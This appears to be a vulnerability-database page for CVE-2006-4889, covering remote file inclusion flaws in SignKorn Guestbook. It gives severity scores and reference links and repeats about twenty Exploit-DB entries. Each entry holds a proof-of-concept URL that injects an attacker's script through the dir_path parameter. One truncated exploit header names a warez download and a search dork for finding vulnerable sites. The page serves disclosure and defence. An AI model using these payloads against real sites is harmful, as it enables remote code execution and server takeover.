CVE-2006-4889
Published 2006-09-19
Priority: P3 37, medium
CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 10.17% (95.1th percentile)
Multiple PHP remote file inclusion vulnerabilities in Telekorn SignKorn Guestbook (SL) 1.3 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the dir_path parameter in (1) index.php, (2) includes/functions.gb.php, (3) includes/functions.admin.php, (4) includes/admin.inc.php, (5) help.php, (6) smile.php, (7) entry.php; (8) adminhelp0.php, (9) adminhelp1.php, (10) adminhelp2.php, and (11) adminhelp3.php in (a) help/en and (b) help/de directories; and the (12) preview.php, (13) log.php, (14) index.php, (15) config.php, and (16) admin.php in the (c) admin directory, a different set of vectors than CVE-2006-4788.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| telekorn | signkorn_guestbook | <= 1.3 | — |
| telekorn | signkorn_guestbook | — | — |
| telekorn | signkorn_guestbook | — | — |
No detection rules found.
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip
#
#Version : v1.3 & all versions below
#
#================================================================================================
#
#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
#
#================================================================================================
#Bug in : in
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
No writeups or analysis indexed.
http://securityreason.com/securityalert/1619
http://www.osvdb.org/32199
http://www.osvdb.org/32200
http://www.osvdb.org/32201
http://www.osvdb.org/32202
http://www.osvdb.org/32203
http://www.osvdb.org/32204
http://www.osvdb.org/32205
http://www.osvdb.org/32206
http://www.osvdb.org/32207
http://www.osvdb.org/32208
http://www.osvdb.org/32209
http://www.osvdb.org/32210
http://www.osvdb.org/32211
http://www.osvdb.org/32212
http://www.osvdb.org/32213
http://www.osvdb.org/32214
http://www.osvdb.org/32215
http://www.osvdb.org/32216
http://www.osvdb.org/32217
http://www.osvdb.org/32218
http://www.securityfocus.com/archive/1/446086/100/0/threaded
http://www.securityfocus.com/bid/19977
http://www.telekorn.com/forum/showthread.php?t=1427
https://exchange.xforce.ibmcloud.com/vulnerabilities/28888